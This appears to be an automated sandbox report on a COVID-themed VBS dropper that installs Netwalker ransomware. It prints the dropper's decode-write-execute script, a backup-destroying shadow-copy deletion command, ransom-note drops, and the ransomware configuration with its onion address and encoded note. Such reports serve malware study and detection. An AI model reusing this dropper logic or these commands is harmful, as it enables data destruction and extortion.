Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\CORONAVIRUS_COVID-19.vbs' |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System information queried: HandleInformation | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: CORONAVIRUS_COVID-19.vbs | Virustotal: Detection: 11% |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\CORONAVIRUS_COVID-19.vbs' | |
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\qeSw.exe C:\Users\user\AppData\Local\Temp\qeSw.exe | |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\qeSw.exe C:\Users\user\AppData\Local\Temp\qeSw.exe | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Directory created: C:\Program Files\7-Zip\E3495D-Readme.txt | Jump to behavior |
Source: | Binary string: SecurityHealthAgent.pdbHeal source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: WscApi.pdbl source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: wscsvc.pdbl source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: shellext.pdbhServic source: qeSw.exe, 00000002.00000002.1483380682.0000000002CCA000.00000004.00000001.sdmp |
Source: | Binary string: WscApi.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: wscui.pdbdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityHealthService.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: WscIsvIf.pdbityCent source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: shellext.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: WscIsvIf.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityHealthSSO.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityCenterBroker.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityCenterBroker.pdbb. source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityHealthSSO.pdb.pdbc source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: wscsvc.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: wscui.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityHealthAgent.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Unpacked PE file: 2.2.qeSw.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Unpacked PE file: 2.2.qeSw.exe.400000.0.unpack |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell")Set FSO = CreateObject("Scripting.FileSystemObject")Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Google.url"set oUrlLink = WshShell.CreateShortcut(Path)oUrlLink.TargetPath = "http://google.com"oUrlLink.Save(G)if (FSO.FileExists(Path)) Then WScript.Echo "Error!"elsexml = "Msxml2.DOMDocument"ws = "WScript.Shell"bin = "bin.base64"bs = "base64"db = "Adodb.Stream"Set wshs = createobject(ws)filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\qeSw.exe"end ifFunction a(n) Dim i, j, abcabc = array("!","@","%",".","?","<",">","$","#",",") For i = 0 To 9n = replace(n, abc(i), "")Nexta = replace(n,"*","/")End FunctionSet oXML = CreateObject(xml)Set oNode = oXML.CreateElement(bs)oNode.dataType = binoNode.text = strreverse(a(code))Set BinaryStream = CreateObject(db)BinaryStream.Type = 1BinaryStream.OpenBinaryStream.Write oNode.nodeTypedValueBinaryStream.SaveToFile filepathwshs.Exec(filepath)'WshShell.Popup "This file might not be the right file type, or it might be corrupted!", 20, "Windows", 0 + 48IWshShell3.ExpandEnvironmentStrings("%TEMP%");IWshShell3.CreateShortcut("C:\Users\user\AppData\Local\Temp\Google.url");IWshURLShortcut.TargetPath("http://google.com");IWshURLShortcut.Save("Unsupported parameter type 00000000");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Google.url");IWshShell3.ExpandEnvironmentStrings("%TEMP%");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFEBQjwAAAAAAAAAAOAADwELAQIAADoBAABQAwAAAAAAgDo");_Stream.Type("1");_Stream.Open();IXMLDOMElement.nodeTypedValue();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\qeSw.exe");IWshShell3.Exec("C:\Users\user\AppData\Local\Temp\qeSw.exe") |
Source: qeSw.exe.0.dr | Static PE information: real checksum: 0x4be47 should be: 0x52514 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D7E0 push ecx; mov dword ptr [esp], 00000000h | 2_2_0040D7E1 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_007A57B0 push edx; ret | 2_2_007A593E |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00785D51 push es; iretd | 2_2_00785D5D |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0078550A push ebp; ret | 2_2_00785538 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0078073D push 00000000h; ret | 2_2_00780748 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00785F0D push esp; ret | 2_2_00785F13 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\qeSw.exe | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\microsoft office\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files\7-Zip\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\ProgramData\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\free window registry repair\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Examples\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\adobe\Acrobat Reader DC\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Extras\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Examples\GUI\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\microsoft office\Office16\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\AutoItX\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\ProgramData\regid.1991-06.com.microsoft\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Examples\Helpfile\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\common files\DESIGNER\E3495D-Readme.txt | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Evasive API call chain: GetComputerName,DecisionNodes,Sleep | graph_2-8408 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep | graph_2-7471 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep | graph_2-8231 |
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe TID: 5724 | Thread sleep time: -300000s >= -30000s | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040BFC0 FindFirstFileW,FindNextFileW, | 2_2_0040BFC0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D070 Sleep,SetErrorMode,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW, | 2_2_0040D070 |
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: *:\program file*\vmware |
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: +~C-{"mpk:"/fqCb2TTvBeb3VoL4lXa1fgDDn+sEO4+mBhIj9vrLEk=","mode:0,"spsz:15360,"thr:1000,"namesz:8,"idsz:6,"lfile:"{id}-Readme.txt,"onion:"rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion,"lend:"SGkhDQpZb3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgYnkgTmV0d2Fsa2VyLg0KQWxsIGVuY3J5cHRlZCBmaWxlcyBmb3IgdGhpcyBjb21wdXRlciBoYXMgZXh0ZW5zaW9uOiAue2lkfQ0KDQotLQ0KSWYgZm9yIHNvbWUgcmVhc29uIHlvdSByZWFkIHRoaXMgdGV4dCBiZWZvcmUgdGhlIGVuY3J5cHRpb24gZW5kZWQsDQp0aGlzIGNhbiBiZSB1bmRlcnN0b29kIGJ5IHRoZSBmYWN0IHRoYXQgdGhlIGNvbXB1dGVyIHNsb3dzIGRvd24sIA0KYW5kIHlvdXIgaGVhcnQgcmF0ZSBoYXMgaW5jcmVhc2VkIGR1ZSB0byB0aGUgYWJpbGl0eSB0byB0dXJuIGl0IG9mZiwNCnRoZW4gd2UgcmVjb21tZW5kIHRoYXQgeW91IG1vdmUgYXdheSBmcm9tIHRoZSBjb21wdXRlciBhbmQgYWNjZXB0IHRoYXQgeW91IGhhdmUgYmVlbiBjb21wcm9taXNlZC4NClJlYm9vdGluZy9zaHV0ZG93biB3aWxsIGNhdXNlIHlvdSB0byBsb3NlIGZpbGVzIHdpdGhvdXQgdGhlIHBvc3NpYmlsaXR5IG9mIHJlY292ZXJ5Lg0KDQotLQ0KT3VyICBlbmNyeXB0aW9uIGFsZ29yaXRobXMgYXJlIHZlcnkgc3Ryb25nIGFuZCB5b3VyIGZpbGVzIGFyZSB2ZXJ5IHdlbGwgcHJvdGVjdGVkLCANCnRoZSBvbmx5IHdheSB0byBnZXQgeW91ciBmaWxlcyBiYWNrIGlzIHRvIGNvb3BlcmF0ZSB3aXRoIHVzIGFuZCBnZXQgdGhlIGRlY3J5cHRlciBwcm9ncmFtLg0KDQpEbyBub3QgdHJ5IHRvIHJlY292ZXIgeW91ciBmaWxlcyB3aXRob3V0IGEgZGVjcnlwdGVyIHByb2dyYW0sIHlvdSBtYXkgZGFtYWdlIHRoZW0gYW5kIHRoZW4gdGhleSB3aWxsIGJlIGltcG9zc2libGUgdG8gcmVjb3Zlci4NCg0KRm9yIHVzIHRoaXMgaXMganVzdCBidXNpbmVzcyBhbmQgdG8gcHJvdmUgdG8geW91IG91ciBzZXJpb3VzbmVzcywgd2Ugd2lsbCBkZWNyeXB0IHlvdSBvbmUgZmlsZSBmb3IgZnJlZS4NCkp1c3Qgb3BlbiBvdXIgd2Vic2l0ZSwgdXBsb2FkIHRoZSBlbmNyeXB0ZWQgZmlsZSBhbmQgZ2V0IHRoZSBkZWNyeXB0ZWQgZmlsZSBmb3IgZnJlZS4NCg0KLS0NCg0KU3RlcHMgdG8gZ2V0IGFjY2VzcyBvbiBvdXIgd2Vic2l0ZToNCg0KMS5Eb3dubG9hZCBhbmQgaW5zdGFsbCB0b3ItYnJvd3NlcjogaHR0cHM6Ly90b3Jwcm9qZWN0Lm9yZy8NCg0KMi5PcGVuIG91ciB3ZWJzaXRlOiB7b25pb259DQoNCjMuUHV0IHlvdXIgcGVyc29uYWwgY29kZSBpbiB0aGUgaW5wdXQgZm9ybToNCg0Ke2NvZGV9,"white:{"path:["*system volume information,"*windows.old,"*:\users\*\*tempmp","*msocache,"*:\winnt","*$windows.~ws,"*perflogs,"*boot,"*:\windows","*:\program file*\vmwaree","\\*\users\*\*temptemp","\\*\winntnt","\\*\windowsws","*\program file*\vmwaree","*appdata*microsoft,"*appdata*packages,"*microsoft\provisioning","*dvd maker,"*Internet Explorer,"*Mozilla,"*Mozilla*,"*Old Firefox data,"*\program file*\windows media**","*\program file*\windows portable**","*windows defender,"*\program file*\windows ntt","*\program file*\windows photo**","*\program file*\windows side**","*\program file*\windowspowershelll","*\program file*\cuass**","*\program file*\microsoft g |